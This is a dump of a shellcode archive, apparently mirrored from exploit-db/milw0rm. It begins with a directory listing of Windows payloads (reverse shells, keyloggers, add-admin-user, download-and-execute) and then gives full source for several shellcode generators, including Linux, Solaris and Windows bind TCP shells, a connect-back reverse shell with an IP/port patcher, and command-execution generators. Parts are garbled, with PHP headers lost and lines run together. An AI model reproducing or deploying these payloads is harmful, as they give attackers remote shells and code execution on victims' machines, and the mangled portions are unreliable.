Windows_x86_-_Executable_Directory_Search_Null-Free_Shellcode__130_bytes___Shellcode_exploit_for_Win_x86_platform │ └── shellcode.c ├── Windows_x86_-_Hide_Console_Window_Shellcode__182_bytes___Shellcode_exploit_for_Win_x86_platform │ └── shellcode.c ├── Windows_x86_-_InitiateSystemShutdownA___Shellcode__599_bytes___Shellcode_exploit_for_Win_x86_platform │ └── shellcode.c ├── Windows_x86_-_JITed_Stage-0_Shellcode__Shellcode_exploit_for_Win_x86_platform │ └── shellcode.c ├── Windows_x86_-_JITed_exec_notepad_Shellcode__Shellcode_exploit_for_Win_x86_platform │ └── shellcode.c ├── Windows_x86_-_MessageBoxA_Shellcode__242_bytes___Shellcode_exploit_for_Win_x86_platform │ └── shellcode.c ├── Windows_x86_-_MessageBox_Shellcode__Metasploit___Shellcode_exploit_for_Win_x86_platform__Tags:_Metasploit_Framework │ └── shellcode.c ├── Windows_x86_-_PEB!NtGlobalFlags_Shellcode__14_bytes___Shellcode_exploit_for_Win_x86_platform │ └── shellcode.c ├── Windows_x86_-_PEB__Kernel32_dll__ImageBase_Finder_Alphanumeric_Shellcode__67_bytes___Shellcode_exploit_for_Win_x86_platform │ └── shellcode.c ├── Windows_x86_-_PEB__Kernel32_dll__ImageBase_Finder__ASCII_Printable__Shellcode__49_bytes___Shellcode_exploit_for_Win_x86_platform │ └── shellcode.c ├── Windows_x86_-_Reverse_TCP_Shell__192_168_232_129:4444_TCP__+_Persistent_Access_Shellcode__494_Bytes___Shellcode_exploit_for_Win_x86_platform │ └── shellcode.c ├── Windows_x86_-_Reverse_TCP_Staged_Alphanumeric_Shell__127_0_0_1:4444_TCP__Shellcode__332_Bytes___Shellcode_exploit_for_Win_x86_platform │ └── shellcode.c ├── Windows_x86_-_Reverse_UDP_Keylogger__www_example_com:4444_UDP__Shellcode__493_bytes___Shellcode_exploit_for_Win_x86_platform │ └── shellcode.c ├── Windows_x86_-_SE_DACL_PROTECTED_Protect_Process_Shellcode__229_bytes___Shellcode_exploit_for_Win_x86_platform │ └── shellcode.c ├── Windows_x86_-_ShellExecuteA_NULL,NULL,_cmd_exe_,NULL,NULL,1__Shellcode__250_bytes___Shellcode_exploit_for_Win_x86_platform │ └── shellcode.c ├── 
Windows_x86_-_URLDownloadToFileA____http:__192_168_86_130_sample_exe__+_SetFileAttributesA____pyld_exe__+_WinExec___+_ExitProcess___Shellcode__394_bytes___Sh__ │ └── shellcode.c ├── Windows_x86_-_WinExec__cmd_exe_,0__Shellcode__184_bytes___Shellcode_exploit_for_Win_x86_platform │ └── shellcode.c ├── Windows_x86_-_Write-to-file___pwned____f_txt__Null-Free_Shellcode__278_bytes___CVE-2010-0425__Shellcode_exploit_for_Win_x86_platform │ └── shellcode.c ├── Windows_x86_-_system__systeminfo___Shellcode__224_bytes___Shellcode_exploit_for_Win_x86_platform │ └── shellcode.c └── Windows_x86_-_user32!MessageBox__Hello_World!__Null-Free_Shellcode__199_bytes___Shellcode_exploit_for_Win_x86_platform │ └── shellcode.c ├── Windows ├── Safari_4_0_5___5_0_0__Windows_XP_7__-_JavaScript_JITed_exec_calc__ASLR_DEP_Bypass__Null-Free_Shellcode__Shellcode_exploit_for_Windows_platform │ └── shellcode.c ├── Windows_-_Add_Administrator_User__BroK3n_BroK3n__Null-Free_Shellcode__194_bytes___Shellcode_exploit_for_Windows_platform │ └── shellcode.c ├── Windows_-_Add_Local_Administrator_User__RubberDuck_mudbath__+_ExitProcess_WinExec_Shellcode__279_bytes___Shellcode_exploit_for_Windows_platform │ └── shellcode.c ├── Windows_-_Egghunter_JITed_Stage-0_Shellcode__Shellcode_exploit_for_Windows_platform │ └── shellcode.c ├── Windows_-_Keylogger_to_File__%TEMP%_log_bin__Null-Free_Shellcode__601_bytes___Shellcode_exploit_for_Windows_platform │ └── shellcode.c ├── Windows_-_Keylogger_to_File____log_bin__Null-Free_Shellcode__431_bytes___Shellcode_exploit_for_Windows_platform │ └── shellcode.c ├── Windows_-_MessageBoxA_Shellcode__238_bytes___Shellcode_exploit_for_Windows_platform │ └── shellcode.c ├── Windows_-_MessageBox_Null-Free_Shellcode__113_bytes___Shellcode_exploit_for_Windows_platform │ └── shellcode.c ├── Windows_-_URLDownloadToFile__http:__bflow_security-portal_cz_down_xy_txt__+_WinExec_+_ExitProcess_Shellcode__Shellcode_exploit_for_Windows_platform │ └── shellcode.c ├── 
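Windows_-_cmd_exe_+_ExitProcess_WinExec_Shellcode__195_bytes___Shellcode_exploit_for_Windows_platform │ └── shellcode.c ├── Windows_Mobile_6_5_TR_-_Phone_Call_Shellcode__Shellcode_exploit_for_Windows_platform │ └── shellcode.c ├── Windows_Mobile_6_5_TR__WinCE_5_2__-_MessageBox_Shellcode__ARM___Shellcode_exploit_for_Windows_platform │ └── shellcode.c ├── Windows_XP_Professional_SP2__English__-_MessageBox_Null-Free_Shellcode__16_bytes___Shellcode_exploit_for_Windows_platform │ └── shellcode.c ├── Windows_XP_Professional_SP2__English__-_Wordpad_Null-Free_Shellcode__12_bytes___Shellcode_exploit_for_Windows_platform │ └── shellcode.c ├── Windows_XP_Professional_SP3_-_calc_exe__C:_WINDOWS_system32_calc_exe__ROP_Shellcode__428_bytes___Shellcode_exploit_for_Windows_platform │ └── shellcode.c ├── Windows_XP_SP2_-_PEB_ISbeingdebugged_Beep_Shellcode__56_bytes___Shellcode_exploit_for_Windows_platform │ └── shellcode.c ├── Windows_XP_SP3__English__-_MessageBoxA_Shellcode__87_bytes___Shellcode_exploit_for_Windows_platform │ └── shellcode.c ├── Windows_XP_Vista_7_-_Egghunter_JITed_Stage-0_Adjusted_Universal_Shellcode__Shellcode_exploit_for_Windows_platform │ └── shellcode.c ├── Windows_XP___10_-_Download_File_+_Execute_Shellcode__Shellcode_exploit_for_Windows_platform │ └── shellcode.c └── Windows_x86_x64_-_cmd_exe_Shellcode__718_bytes___Shellcode_exploit_for_Windows_platform │ └── shellcode.c ├── getItem.py └── getItem.pyc
/Generator/Linux_-_write___+_exit_0__Shellcode__Generator___Shellcode_exploit_for_Generator_platform/shellcode.c:
--------------------------------------------------------------------------------
#!/usr/bin/python
# Linux write() & exit(0) shellcode generator with customizable text
# Usage: ./generator
# Author: Stoke
# Tested on: Ubuntu 8.10
# E-mail: stoke95[at]yahoo[dot]it
# Web: hack2web.altervista.org
# Visit: blasterhacking.forumcommunity.net
#
# Emits, as a C-style "\xNN" escape string, a Linux/x86 (int 0x80) payload
# that write()s the given text to stdout and then calls exit(0).
#
# Layout of the payload (decoded from the two byte strings below):
#   eb 11             jmp  +0x11       -> the call at the end
#   31 c0             xor  eax,eax
#   b0 04             mov  al,4        SYS_write
#   b3 01             mov  bl,1        fd 1 (stdout)
#   59                pop  ecx         ecx = address of the text (pushed by the call)
#   b2 LL             mov  dl,LL       LL = text length -- ONE byte, so at most 255
#   cd 80             int  0x80
#   b0 01             mov  al,1        SYS_exit
#   31 db             xor  ebx,ebx     status 0
#   cd 80             int  0x80
#   e8 ea ff ff ff    call -0x16       back to "xor eax,eax", pushing the text address
#   <text bytes>
#
# NOTE(review): the text is appended raw after the call. A text containing
# 0x00 (or any byte the injection vector filters) breaks the payload; nothing
# here encodes it. The length byte is also emitted raw, so a 0-byte text would
# put a 0x00 in the payload -- both cases are rejected below.

import re, sys

# Bytes before the one-byte length operand of "mov %dl", and the bytes after it.
shell = r"\xeb\x11\x31\xc0\xb0\x04\xb3\x01\x59\xb2"
shell1 = r"\xcd\x80\xb0\x01\x31\xdb\xcd\x80\xe8\xea\xff\xff\xff"

# "mov $len, %dl" loads a single byte; the original generator emitted a broken
# three-digit escape (e.g. "\x100") for longer text instead of refusing it.
MAX_TEXT_LEN = 0xff


def _as_bytes(string):
    """Return the raw bytes of ``string`` as a bytearray (iterates as ints on Python 2 and 3).

    Python 2 passes argv as byte strings; Python 3 passes str, which is UTF-8
    encoded here so that every emitted escape is a real byte in 0x00..0xff
    (the original called ord() on str and could emit code points above 0xff).
    """
    if isinstance(string, (bytes, bytearray)):
        return bytearray(string)
    return bytearray(string.encode("utf-8"))


def str2hex(string):
    """Return ``string`` as a run of two-digit C escapes, e.g. "A\\n" -> "\\x41\\x0a".

    Every byte is zero-padded to two hex digits. The original emitted "\\xa"
    for 0x0a; C tolerates that, but Python byte literals and most hex parsers
    reject a one-digit \\x escape.
    """
    return "".join("\\x%02x" % byte for byte in _as_bytes(string))


def build_shellcode(string):
    """Assemble the complete escape string for ``string``.

    Raises ValueError when the text is empty (the length byte would be \\x00)
    or longer than MAX_TEXT_LEN bytes (it would not fit in %dl).
    """
    data = _as_bytes(string)
    if not data:
        raise ValueError("text must not be empty (the length byte would be \\x00)")
    if len(data) > MAX_TEXT_LEN:
        raise ValueError("text is %d bytes; at most %d fit in the one-byte length"
                         % (len(data), MAX_TEXT_LEN))
    # The length escape is zero-padded exactly like every other byte.
    return shell + "\\x%02x" % len(data) + shell1 + str2hex(data)


def main(argv):
    """Command-line entry point; returns the process exit status (non-zero on error)."""
    if len(argv) != 2:
        sys.stdout.write("Usage: ./shellgen \n")
        return 1
    try:
        code = build_shellcode(argv[1])
    except ValueError as err:
        sys.stderr.write("error: %s\n" % err)
        return 1
    sys.stdout.write(code + "\n")
    return 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))
--------------------------------------------------------------------------------
/Generator/Linux_x86_-_Bind_TCP_Shell_Shellcode__Generator___Shellcode_exploit_for_Generator_platform/shellcode.c:
--------------------------------------------------------------------------------
http://www.shell-storm.org/shellcode/
*/
/* NOTE(review): the opening "<?php" and lines 2-7 of this header were lost
 * when the page was extracted; only the tail of the original comment survives. */

function syntax()
{
    echo "\nSyntax:\nroot@laptop:/# php ./payload.php \n\n";
}

function linux86bind($port)
{
    if($port > 65535 || $port < 4100){
        echo "Erreur Port\nSelect a port between 4100 and 65535\n";
        return false;
    }

    $inser .= "\nchar shellcode[] = \n";
    $inser .= " /* BindPort TCP/$port; Linux/x86; Gen:http://www.shell-storm.org */\n";
    $inser .= "\n";
    // 31 c0 31 db b0 17 cd 80 = setuid(0) before the socketcall() sequence.
    $inser .= " \x22\\x31\\xc0\\x31\\xdb\\xb0\\x17\\xcd\\x80\\x31\\xdb\\xf7\\xe3\\xb0\\x66\\x53\\x43\\x53\x22\n";
    $inser .= " \x22\\x43\\x53\\x89\\xe1\\x4b\\xcd\\x80\\x89\\xc7\\x52\\x66\\x68\\x";

    $res_port = base_convert($port, 10, 16);

    $length = strlen($res_port)-1;
    $i = 1;

    // NOTE(review): "\x" is inserted after the second hex digit, so the port is
    // only encoded correctly when it has exactly four hex digits. That is what
    // the range check above enforces (4096 = 0x1000 would already qualify; the
    // author chose 4100). The bytes land in network (big-endian) order for the
    // "push $imm16" that follows.
    for($idx = 0; $idx < $length+1; $idx++)
    {
        $i++;
        if($i == 4)
            $inser .= "\\x";

        $inser .= $res_port[$idx];
    }

    $inser .= "\\x43\\x66\\x53\x22\n";
    $inser .= " \x22\\x89\\xe1\\xb0\\x10\\x50\\x51\\x57\\x89\\xe1\\xb0\\x66\\xcd\\x80\\xb0\\x66\\xb3\\x04\x22\n";
    $inser .= " \x22\\xcd\\x80\\x50\\x50\\x57\\x89\\xe1\\x43\\xb0\\x66\\xcd\\x80\\x89\\xd9\\x89\\xc3\\xb0\x22\n";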
$inser .= " \x22\\x3f\\x49\\xcd\\x80\\x41\\xe2\\xf8\\x51\\x68n/sh\\x68//bi\\x89\\xe3\\x51\\x53\\x89\x22\n"; 46 | $inser .= " \x22\\xe1\\xb0\\x0b\\xcd\\x80\x22\x3b\n"; 47 | $inser .= "\n"; 48 | $inser .= " printf(\x22Length: %d\\n\x22,strlen(shellcode));\n"; 49 | $inser .= " (*(void(*)()) shellcode)();\n"; 50 | $inser .= "\n"; 51 | $inser .= "\n"; 52 | 53 | return $inser; 54 | } 55 | 56 | if($argc < 2){ 57 | syntax(); 58 | return false; 59 | } 60 | $port = $argv[1]; 61 | echo linux86bind($port); 62 | 63 | ?> 64 | 65 | # milw0rm.com [2009-06-09] -------------------------------------------------------------------------------- /Generator/Linux_x86_-_Command_Generator_Null-Free_Shellcode__Generator___Shellcode_exploit_for_Generator_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /** 2 | * 3 | * BlackLight's shellcode generator for Linux x86 4 | * Tested anywhere, working & NULL-free 5 | * 6 | * Usage: ./generator 7 | * ...and then you've got a ready2inject NULL-free shellcode for the command you like 8 | * 9 | * copyleft 2008 by BlackLight 10 | * < http://blacklight.gotdns.org > 11 | * 12 | * Released under GPL v.3 licence 13 | * 14 | * Greetz to: evilsocket, for the idea he gave me ;) 15 | * Greetz to: my friends, who tested, used and appreciated this code and helped 16 | * me to improve it to what it is now 17 | * Greetz to: my girl, next to me in any moment even if she had no idea 18 | * about what I was doing ^^ 19 | */ 20 | 21 | #include 22 | #include 23 | #include 24 | 25 | char code[] = 26 | "\\x60" /*pusha*/ 27 | "\\x31\\xc0" /*xor %eax,%eax*/ 28 | "\\x31\\xd2" /*xor %edx,%edx*/ 29 | "\\xb0\\x0b" /*mov $0xb,%al*/ 30 | "\\x52" /*push %edx*/ 31 | "\\x68\\x6e\\x2f\\x73\\x68" /*push $0x68732f6e*/ 32 | "\\x68\\x2f\\x2f\\x62\\x69" /*push $0x69622f2f*/ 33 | "\\x89\\xe3" /*mov %esp,%ebx*/ 34 | "\\x52" /*push %edx*/ 35 | "\\x68\\x2d\\x63\\x63\\x63" /*push $0x6363632d*/ 36 | "\\x89\\xe1" /*mov %esp,%ecx*/ 37 | 
"\\x52" /*push %edx*/ 38 | "\\xeb\\x07" /*jmp 804839a */ 39 | "\\x51" /*push %ecx*/ 40 | "\\x53" /*push %ebx*/ 41 | "\\x89\\xe1" /*mov %esp,%ecx*/ 42 | "\\xcd\\x80" /*int $0x80*/ 43 | "\\x61" /*popa*/ 44 | "\\xe8\\xf4\\xff\\xff\\xff" /*call 8048393 */; 45 | 46 | int main (int argc, char **argv) { 47 | int i,len=0; 48 | char *shell,*cmd; 49 | 50 | if (!argv[1]) 51 | exit(1); 52 | 53 | for (i=1; i: 12 | 8048060: eb 12 jmp 0x8048074 13 | 8048062: 5b pop %ebx 14 | 8048063: 31 c0 xor %eax,%eax 15 | 8048065: 88 43 05 mov %al,0x5(%ebx) 16 | 8048068: b0 08 mov $0x8,%al 17 | 804806a: b1 ff mov $0xff,%cl 18 | 804806c: b5 ff mov $0xff,%ch 19 | 804806e: cd 80 int $0x80 20 | 8048070: b0 01 mov $0x1,%al 21 | 8048072: cd 80 int $0x80 22 | 8048074: e8 e9 ff ff ff call 0x8048062 23 | 8048079: 61 popa 24 | 804807a: 6a 69 push $0x69 25 | 804807c: 74 68 je 0x80480e6 26 | 804807e: 23 .byte 0x23 27 | --------------------------------------------------------------------------------- 28 | b4ck 2 h4ck --- Ajith Kp [@ajithkp560] --- http://www.terminalcoders.blogspot.com 29 | 30 | Om Asato Maa Sad-Gamaya | 31 | Tamaso Maa Jyotir-Gamaya | 32 | Mrtyor-Maa Amrtam Gamaya | 33 | Om Shaantih Shaantih Shaantih | 34 | """ 35 | 36 | bann3r = ''' 37 | /* 38 | [][][][][][][][][][][][][][][][][][][][][][][] 39 | [] [] 40 | [] c0d3d by Ajith Kp [ajithkp560] [] 41 | [] http://www.terminalcoders.blogspot.in [] 42 | [] [] 43 | [][][][][][][][][][][][][][][][][][][][][][][] 44 | */ 45 | ''' 46 | sh3ll = "\\xeb\\x12\\x5b\\x31\\xc0\\x88\\x43" 47 | sh311 ="\\xb0\\x08\\xb1\\xff\\xb5\\xff\\xcd\\x80\\xb0\\x01\\xcd\\x80\\xe8\\xe9\\xff\\xff\\xff" 48 | print bann3r 49 | if len(argv)<1: 50 | print 'Usage: '+argv[0]+' name_of_file' 51 | else: 52 | fil3 = argv[1] 53 | h3x = '' 54 | for i in range(len(fil3)): 55 | h3x+=str('\\'+hex(ord(fil3[i]))[1:]) 56 | h3x+=str('\\' + 'x23') 57 | l3n = '\\x'+hex((len(fil3)))[2:].zfill(2) 58 | sh = str(sh3ll) + str(l3n) + str(sh311) + str(h3x) 59 | print '// Compile with' 60 | print 
'// $ gcc -o output source.c' 61 | print '// $ execstack -s output' 62 | print '// $ ./output' 63 | print '////////////////////////////////////////////\n' 64 | print '# include ' 65 | print 'char sh[] = "'+sh+'";' 66 | print 'main(int argc, char **argv)' 67 | print '''{ 68 | int (*func)(); 69 | func = (int (*)()) sh; 70 | (int)(*func)();''' 71 | print '}' 72 | print '\n////////////////////////////////////////////' -------------------------------------------------------------------------------- /Generator/Linux_x86_-_Reverse_TCP_Shell_Shellcode__90_bytes___Generator___Shellcode_exploit_for_Generator_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /*---------------------------------------------------------------------------* 2 | * 90 byte Connect Back shellcode * 3 | * by Russell Sanford - xort@tty64.org * 4 | *---------------------------------------------------------------------------* 5 | * filename: x86-linux-connect-back.c * 6 | * info: Compiled with DTP Project. * 7 | * discription: This is a x86-linux connect back shellcode. Just invoke * 8 | * the function patchcode() before using shellcode. 
The format * 9 | * for invoking patchcode is as follows: * 10 | * * 11 | * patchcode(shellcode,"11.22.33.44",31337); * 12 | *---------------------------------------------------------------------------*/ 13 | 14 | char shellcode[] = 15 | "\x31\xc0\x6a\x01\x5b\x50\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x5b\x43\x5f\x68" 16 | " xor\x81\x04\x24t@tt\x68y64.\x81\x04\x24org \x6a\x10\x51\x50\x89\xe1\xb0\x66" 17 | "\xcd\x80\x5b\x31\xc9\x6a\x3f\x58\xcd\x80\x41\x80\xf9\x03\x75\xf5\x31\xc0\x50" 18 | "\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b" 19 | "\xcd\x80\xeb\xfe"; 20 | 21 | int find_safe_offset(int INT_A) { 22 | 23 | int INT_B=0; 24 | 25 | do { 26 | INT_A -= 0x01010101; INT_B += 0x01010101; 27 | } 28 | while ( ((INT_A & 0x000000ff) == 0) || 29 | ((INT_A & 0x0000ff00) == 0) || 30 | ((INT_A & 0x00ff0000) == 0) || 31 | ((INT_A & 0xff000000) == 0) ); 32 | 33 | return INT_B; 34 | } 35 | 36 | void patchcode(char *shellcode, char *IP, int PORT) { 37 | 38 | int IP_A = inet_addr(IP); 39 | int IP_B = find_safe_offset(IP_A); 40 | 41 | int PORT_A = ((ntohs(PORT) << 16) + 2); 42 | int PORT_B = find_safe_offset(PORT_A); 43 | 44 | *(int *)&shellcode[19] = (IP_A - IP_B); 45 | *(int *)&shellcode[26] = IP_B; 46 | 47 | *(int *)&shellcode[31] = (PORT_A - PORT_B); 48 | *(int *)&shellcode[38] = PORT_B; 49 | } 50 | 51 | // milw0rm.com [2005-12-28] -------------------------------------------------------------------------------- /Generator/Linux_x86_-_Typewriter_Shellcode__Generator___Shellcode_exploit_for_Generator_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | # Typewriter Shellcode Generator 4 | # Paw Petersen, SLAE-656 5 | # https://www.pawpetersen.dk/typewriter-shellcode-generator-linux-x86/ 6 | 7 | import sys,struct 8 | 9 | string = sys.argv[1] 10 | 11 | length = struct.pack("= len(string): 17 | if len(chunk) < 4: 18 | asm_string_chunk = 
("\x68"+struct.pack("<4s",chunk+"\x0a"*(4-len(chunk))))+asm_string_chunk 19 | else: 20 | asm_string_chunk = ("\x68"+struct.pack("<4s",chunk))+asm_string_chunk 21 | asm_string_chunk = ("\x68"+struct.pack("<4s","\x0a"*4))+asm_string_chunk 22 | else: 23 | asm_string_chunk = ("\x68"+struct.pack("<4s",chunk))+asm_string_chunk 24 | 25 | sc = asm_string_chunk+"\x31\xc9\xb1"+length+"\x51\xb8\x11\x11\x51\x08\x50\x31\xc0\x50\x54\x51\x89\xe6\x83\xc6\x14\x03\x74\x24\x10\x2b\x34\x24\x56\x89\xf1\xeb\x1c\xeb\x0c\x59\x59\xe2\xe8\x31\xdb\x31\xc0\xb0\x01\xcd\x80\x31\xc0\xb0\xa2\x8d\x5c\x24\x0c\x31\xc9\xcd\x80\xeb\xe6\x31\xd2\xb2\x01\x31\xdb\xb3\x01\x31\xc0\xb0\x04\xcd\x80\xeb\xd4" 26 | 27 | print '"' + ''.join('\\x%02x' % ord(c) for c in sc) + '";' -------------------------------------------------------------------------------- /Generator/Solaris_x86_-_Bind_TCP_Shell_Shellcode__Generator___Shellcode_exploit_for_Generator_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | http://www.shell-storm.org/shellcode/ 8 | */ 9 | 10 | function syntax() 11 | { 12 | echo "\nSyntax:\nroot@laptop:/# php ./payload.php \n\n"; 13 | } 14 | 15 | function win32bind($port) 16 | { 17 | if($port > 65535 || $port < 4100){ 18 | echo "Erreur Port\nSelect a port between 4100 and 65535\n"; 19 | return false; 20 | } 21 | 22 | $inser .= "\nchar shellcode[] = \n"; 23 | $inser .= " /* BindPort TCP/$port; Os:Solaris; Gen:http://payload.shell-storm.org */\n"; 24 | $inser .= "\n"; 25 | 26 | $inser .= " \x22\\xb8\\xff\\xf8\\xff\\x3c\\xf7\\xd0\\x50\\x31\\xc0\\xb0\\x9a\\x50\\x89\\xe5\\x31\\xc9\x22\n"; 27 | $inser .= " \x22\\x51\\x41\\x41\\x51\\x51\\xb0\\xe6\\xff\\xd5\\x31\\xd2\\x89\\xc7\\x52\\x66\\x68\x22\n"; 28 | $inser .= " \x22\\x"; 29 | 30 | $res_port = base_convert($port, 10, 16); 31 | 32 | $length = strlen($res_port)-1; 33 | $i = 1; 34 | 35 | for($idx = 0; $idx < $length+1; $idx++) 36 | { 37 | $i++; 38 | if($i == 4) 39 | $inser .= "\\x"; 40 | 41 | $inser .= 
$res_port[$idx]; 42 | } 43 | $inser .= "\x22 /* Port ".$port." */\n"; 44 | $inser .= " \x22\\x66\\x51\\x89\\xe6\\x6a\\x10\\x56\\x57\\xb0\\xe8\\xff\\xd5\\xb0\\xe9\\xff\\xd5\x22\n"; 45 | $inser .= " \x22\\x50\\x50\\x57\\xb0\\xea\\xff\\xd5\\x31\\xd2\\xb2\\x09\\x51\\x52\\x50\\xb0\\x3e\x22\n"; 46 | $inser .= " \x22\\xff\\xd5\\x49\\x79\\xf2\\x50\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\x22\n"; 47 | $inser .= " \x22\\x89\\xe3\\x50\\x53\\x89\\xe2\\x50\\x52\\x53\\xb0\\x3b\\xff\\xd5\x22\x3b\n"; 48 | $inser .= "\n"; 49 | $inser .= " printf(\x22Length: %d\\n\x22,strlen(shellcode));\n"; 50 | $inser .= " (*(void(*)()) shellcode)();
"; 51 | $inser .= "\n"; 52 | $inser .= "\n"; 53 | 54 | return $inser; 55 | } 56 | 57 | if($argc < 2){ 58 | syntax(); 59 | return false; 60 | } 61 | $port = $argv[1]; 62 | echo win32bind($port); 63 | 64 | ?> 65 | 66 | # milw0rm.com [2009-06-16] -------------------------------------------------------------------------------- /Generator/Windows_XP_SP1_-_Bind_TCP_Shell_Shellcode__Generator___Shellcode_exploit_for_Generator_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | http://www.shell-storm.org/shellcode/ 8 | */ 9 | 10 | function syntax() 11 | { 12 | echo "\nSyntax:\nroot@laptop:/# php ./payload.php \n\n"; 13 | } 14 | 15 | function win32bind($port) 16 | { 17 | if($port > 65535 || $port < 4100){ 18 | echo "Erreur Port\nSelect a port between 4100 and 65535\n"; 19 | return false; 20 | } 21 | 22 | $inser .= "\nchar shellcode[] = \n"; 23 | $inser .= " /* BindPort TCP/$port; Os:XP/SP1; Gen:http://www.shell-storm.org */\n"; 24 | $inser .= "\n"; 25 | 26 | $inser .= " \x22\\x83\\xC4\\xEC\\x33\\xC0\\x50\\x50\\x50\\x6A\\x06\\x6A\\x01\\x6A\\x02\\xB8\x22\n"; 27 | $inser .= " \x22\\x01\\x5A\\xAB\\x71\\xFF\\xD0\\x8B\\xD8\\x33\\xC0\\x89\\x45\\xF4\\xB0\\x02\x22\n"; 28 | $inser .= " \x22\\x66\\x89\\x45\\xF0\\x66\\xC7\\x45\\xF2"; 29 | $inser .= "\\x"; 30 | 31 | $res_port = base_convert($port, 10, 16); 32 | 33 | $length = strlen($res_port)-1; 34 | $i = 1; 35 | 36 | for($idx = 0; $idx < $length+1; $idx++) 37 | { 38 | $i++; 39 | if($i == 4) 40 | $inser .= "\\x"; 41 | 42 | $inser .= $res_port[$idx]; 43 | } 44 | $inser .= "\\x6A\\x10\\x8D\\x55\\xF0\x22\n"; 45 | $inser .= " \x22\\x52\\x53\\xB8\\xCE\\x3E\\xAB\\x71\\xFF\\xD0\\x6A\\x01\\x53\\xB8\\xE2\\x5D\x22\n"; 46 | $inser .= " \x22\\xAB\\x71\\xFF\\xD0\\x33\\xC0\\x50\\x50\\x53\\xB8\\x8D\\x86\\xAB\\x71\\xFF\x22\n"; 47 | $inser .= " \x22\\xD0\\x8B\\xD8\\xBA\\x1D\\x20\\xE8\\x77\\x53\\x6A\\xF6\\xFF\\xD2\\x53\\x6A\x22\n"; 48 | $inser .= " 
\x22\\xF5\\xFF\\xD2\\x53\\x6A\\xF4\\xFF\\xD2\\xC7\\x45\\xFB\\x41\\x63\\x6D\\x64\x22\n"; 49 | $inser .= " \x22\\x8D\\x45\\xFC\\x50\\xB8\\x44\\x80\\xC2\\x77\\xFF\\xD0\x22\x3b\n\n"; 50 | $inser .= " printf(\x22Length: %d\\n\x22,strlen(shellcode));\n"; 51 | $inser .= " (*(void(*)()) shellcode)();\n\n"; 52 | 53 | return $inser; 54 | } 55 | 56 | if($argc < 2){ 57 | syntax(); 58 | return false; 59 | } 60 | $port = $argv[1]; 61 | echo win32bind($port); 62 | 63 | ?> 64 | 65 | # milw0rm.com [2009-06-09] -------------------------------------------------------------------------------- /Generator/Windows_XP___10_-_Command_Generator_WinExec_Null-Free_Shellcode__Generator___Shellcode_exploit_for_Generator_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | #All Windows Null-Free WinExec Shellcode 2 | 3 | """ 4 | #Coded by B3mB4m 5 | #Concat : b3mb4m@tuta.io 6 | #Home : b3mb4m.blogspot.com 7 | #10.12.2015 8 | Tested on : 9 | Windows XP/SP3 x86 10 | Windows 7 Ultimate x64 11 | Windows 8.1 Pro Build 9600 x64 12 | Windows 10 Home x64 13 | -This shellcode NOT using GetProcAddress function- 14 | -With this python script you can create ur own shellcode- 15 | -This script belongs to shellsploit project- 16 | -https://github.com/b3mb4m/Shellsploit- 17 | """ 18 | 19 | 20 | 21 | def WinExec( command, fill=None): 22 | from re import findall 23 | fill = "31c9b957696e45eb0431c9eb0031c" 24 | fill += "031db31d231ff31f6648b7b308b7f0" 25 | fill += "c8b7f1c8b47088b77208b3f807e0c3" 26 | fill += "375f289c703783c8b577801c28b7a2" 27 | fill += "001c789dd81f957696e45753b8b34a" 28 | fill += "f01c645390e75f68b7a2401c7668b2" 29 | fill += "c6f8b7a1c01c78b7caffc01c789d9b1ff53e2fd" 30 | if len(command) == 4: 31 | stack = "%s" % (command.encode('hex')) 32 | data = findall("..?", stack) 33 | fill += "68"+"".join(data) 34 | else: 35 | if len(command)%4 == 3: 36 | padd = "\x20" 37 | elif len(command)%4 == 2: 38 | padd = "\x20"*2 39 | elif len(command)%4 == 1: 
40 | padd = "\x20"*3 41 | else: 42 | padd = "" 43 | command = command + padd 44 | fixmesempai = findall('....?', command) 45 | for x in fixmesempai[::-1]: 46 | first = str(x[::-1].encode("hex")) 47 | second = findall("..?", first)[::-1] 48 | fill += "68"+"".join(second) 49 | fill += "89e2415152ffd7e886ffffff8b34af0" 50 | fill += "1c645813e4578697475f2817e045072" 51 | fill += "6f6375e98b7a2401c7668b2c6f8b7a1c" 52 | fill += "01c78b7caffc01c731c951ffd7" 53 | 54 | from random import randint 55 | name = str(randint(99999,99999999))+".txt" 56 | with open(name, "w") as exploit: 57 | exploit.write("\\x"+"\\x".join(findall("..?", fill))) 58 | exploit.close() 59 | 60 | print "\n\nLength : %s" % len(findall("..?", fill)) 61 | print "File : %s\n" % name 62 | print "\n\\x"+"\\x".join(findall("..?", fill)) 63 | 64 | 65 | if __name__ == '__main__': 66 | from sys import argv 67 | if len(argv) < 2: 68 | print "\nUsage : python exploit.py 'command'\n" 69 | else: 70 | WinExec(argv[1]) 71 | 72 | 73 | 74 | """ 75 | #include 76 | #include 77 | #include 78 | #include 79 | 80 | //gcc shell.c -o shell.exe 81 | 82 | int main(void){ 83 | char *shellcode = "SHELLCODE"; 84 | DWORD mypage; 85 | BOOL ret = VirtualProtect (shellcode, strlen(shellcode), 86 | PAGE_EXECUTE_READWRITE, &mypage); 87 | 88 | if (!ret) { 89 | printf ("VirtualProtect Failed ..\n"); 90 | return EXIT_FAILURE;} 91 | printf("strlen(shellcode)=%d\n", strlen(shellcode)); 92 | ((void (*)(void))shellcode)(); 93 | } 94 | """ -------------------------------------------------------------------------------- /Lin_x86-64/Linux_x86-64_-_Bind_Netcat_Shell_Null-Free_Shellcode__64_bytes___Shellcode_exploit_for_Lin_x86-64_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | // Exploit Title: [NetCat Bind Shell 64bit 64byte] 5 | // Date: [6/28/2016] 6 | // Exploit Author: [CripSlick] 7 | // Tested on: [Kali 2.0] 8 | // Version: [v1.10-41] 9 | 10 | // 
